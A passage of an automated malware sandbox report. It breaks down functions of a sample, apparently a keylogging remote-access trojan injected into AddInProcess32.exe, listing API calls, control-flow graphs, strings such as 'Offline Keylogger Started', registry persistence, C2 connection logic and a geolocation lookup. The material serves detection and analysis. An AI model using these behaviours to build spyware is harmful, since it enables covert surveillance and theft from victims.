414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->583
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                        • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                        • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                                                        • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                        • API String ID: 524882891-4135588375
                                                                                                        • Opcode ID: dac346f827ee475e75f6dbaddde8e77ce37e6b889d460038b107c94c4f06d8da
                                                                                                        • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                        • Opcode Fuzzy Hash: dac346f827ee475e75f6dbaddde8e77ce37e6b889d460038b107c94c4f06d8da
                                                                                                        • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                                                                                                        Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                          • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                          • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                          • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                          • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                        • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                        • API String ID: 3795512280-3163867910
                                                                                                        • Opcode ID: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                                        • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                        • Opcode Fuzzy Hash: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                                        • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                                        Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1022 40428c-4042ad connect 1023 4043e1-4043e5 1022->1023 1024 4042b3-4042b6 1022->1024 1027 4043e7-4043f5 WSAGetLastError 1023->1027 1028 40445f 1023->1028 1025 4043da-4043dc 1024->1025 1026 4042bc-4042bf 1024->1026 1029 404461-404465 1025->1029 1030 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1026->1030 1031 4042eb-4042f5 call 420151 1026->1031 1027->1028 1032 4043f7-4043fa 1027->1032 1028->1029 1030->1031 1041 404306-404313 call 420373 1031->1041 1042 4042f7-404301 1031->1042 1035 404439-40443e 1032->1035 1036 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1032->1036 1038 404443-40445c call 401f66 * 2 call 41a686 1035->1038 1036->1028 1038->1028 1056 404315-404338 call 401f66 * 2 call 41a686 1041->1056 1057 40434c-404357 call 420f34 1041->1057 1042->1038 1085 40433b-404347 call 420191 1056->1085 1068 404389-404396 call 4202ea 1057->1068 1069 404359-404387 call 401f66 * 2 call 41a686 call 420592 1057->1069 1079 404398-4043bb call 401f66 * 2 call 41a686 1068->1079 1080 4043be-4043d7 CreateEventW * 2 1068->1080 1069->1085 1079->1080 1080->1025 1085->1028
                                                                                                        APIs
                                                                                                        • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                        • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                        • API String ID: 994465650-2151626615
                                                                                                        • Opcode ID: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                                        • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                        • Opcode Fuzzy Hash: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                                        • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                        Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                        • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                                                        • API String ID: 911427763-3954389425
                                                                                                        • Opcode ID: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                                        • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                        • Opcode Fuzzy Hash: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                                        • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                        Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1177 40c89e-40c8c3 call 401e52 1180 40c8c9 1177->1180 1181 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1177->1181 1182 40c8d0-40c8d5 1180->1182 1183 40c9c2-40c9c7 1180->1183 1184 40c905-40c90a 1180->1184 1185 40c9d8 1180->1185 1186 40c9c9-40c9ce call 43ac0f 1180->1186 1187 40c8da-40c8e8 call 41a74b call 401e18 1180->1187 1188 40c8fb-40c900 1180->1188 1189 40c9bb-40c9c0 1180->1189 1190 40c90f-40c916 call 41b15b 1180->1190 1207 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1181->1207 1193 40c9dd-40c9e2 call 43ac0f 1182->1193 1183->1193 1184->1193 1185->1193 1198 40c9d3-40c9d6 1186->1198 1211 40c8ed 1187->1211 1188->1193 1189->1193 1202 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1190->1202 1203 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1190->1203 1204 40c9e3-40c9e8 call 4082d7 1193->1204 1198->1185 1198->1204 1216 40c8f1-40c8f6 call 401e13 1202->1216 1203->1211 1204->1181 1211->1216 1216->1181
                                                                                                        APIs
                                                                                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LongNamePath
                                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                        • API String ID: 82841172-425784914
                                                                                                        • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                        • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                        • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                        • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                                        Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1323 41a51b-41a55a call 401faa call 43a88c InternetOpenW InternetOpenUrlW 1328 41a55c-41a57d InternetReadFile 1323->1328 1329 41a5a3-41a5a6 1328->1329 1330 41a57f-41a59f call 401f86 call 402f08 call 401eea 1328->1330 1331 41a5a8-41a5aa 1329->1331 1332 41a5ac-41a5b9 InternetCloseHandle * 2 call 43a887 1329->1332 1330->1329 1331->1328 1331->1332 1337 41a5be-41a5c8 1332->1337
                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                        Strings
                                                                                                        • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                        • String ID: http://geoplugin.net/json.gp
                                                                                                        • API String ID: 3121278467-91888290
                                                                                                        • Opcode ID: 36e01e55f813b3e587d73a157094a3d7c5a29764a6c694396ca7ce848afa256e
                                                                                                        • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                        • Opcode Fuzzy Hash: 36e01e55f813b3e587d73a157094a3d7c5a29764a6c694396ca7ce848afa256e
                                                                                                        • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                        Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                        • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                        • API String ID: 1866151309-2070987746
                                                                                                        • Opcode ID: 45f2cc7f8136337c42f5944fd7cecdfc8e179c6ee647a5e14532dc020d3e2dac
                                                                                                        • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                        • Opcode Fuzzy Hash: 45f2cc7f8136337c42f5944fd7cecdfc8e179c6ee647a5e14532dc020d3e2dac
                                                                                                        • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                        Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1365 409d97-409da7 1366 409e44-409e47 1365->1366 1367 409dad-409daf 1365->1367 1368 409db2-409dd8 call 401e07 CreateFileW 1367->1368 1371 409e18 1368->1371 1372 409dda-409de8 GetFileSize 1368->1372 1375 409e1b-409e1f 1371->1375 1373 409dea 1372->1373 1374 409e0f-409e16 CloseHandle 1372->1374 1377 409df4-409dfb 1373->1377 1378 409dec-409df2 1373->1378 1374->1375 1375->1368 1376 409e21-409e24 1375->1376 1376->1366 1379 409e26-409e2d 1376->1379 1380 409e04-409e09 Sleep 1377->1380 1381 409dfd-409dff call 40a7f0 1377->1381 1378->1374 1378->1377 1379->1366 1382 409e2f-409e3f call 4082dc call 4098a5 1379->1382 1380->1374 1381->1380 1382->1366
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                                                        • String ID: `AG
                                                                                                        • API String ID: 1958988193-3058481221
                                                                                                        • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                        • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                        • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                        • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                        Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1387 4126d2-4126e9 RegCreateKeyA 1388 412722 1387->1388 1389 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1387->1389 1391 412724-412730 call 401eea 1388->1391 1389->1391
                                                                                                        APIs
                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                        • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                        • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID: HgF$pth_unenc
                                                                                                        • API String ID: 1818849710-3662775637
                                                                                                        • Opcode ID: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                                        • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                        • Opcode Fuzzy Hash: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                                        • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                        Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                                                        • String ID: Offline Keylogger Started
                                                                                                        • API String ID: 465354869-4114347211
                                                                                                        • Opcode ID: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                                                        • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                        • Opcode Fuzzy Hash: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                                                        • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                        Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                        • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID: TUF
                                                                                                        • API String ID: 1818849710-3431404234
                                                                                                        • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                        • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                        • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                        • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                        Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3360349984-0
                                                                                                        • Opcode ID: f4aaeb2080a592ab8258315a72005a76cc9d26b97f258a459caff36ba9a30bf0
                                                                                                        • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                        • Opcode Fuzzy Hash: f4aaeb2080a592ab8258315a72005a76cc9d26b97f258a459caff36ba9a30bf0
                                                                                                        • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                        Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                        • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3604237281-0
                                                                                                        • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                        • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                        • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                        • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                        Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CountEventTick
                                                                                                        • String ID: >G
                                                                                                        • API String ID: 180926312-1296849874
                                                                                                        • Opcode ID: e43420cbb1104f7685dac86efea1cb921a074aae9cf36a541284d59b132dd712
                                                                                                        • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                        • Opcode Fuzzy Hash: e43420cbb1104f7685dac86efea1cb921a074aae9cf36a541284d59b132dd712
                                                                                                        • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                        Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                        • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                        • String ID: (CG
                                                                                                        • API String ID: 1925916568-4210230975
                                                                                                        • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                        • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                        • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                        • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                        Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
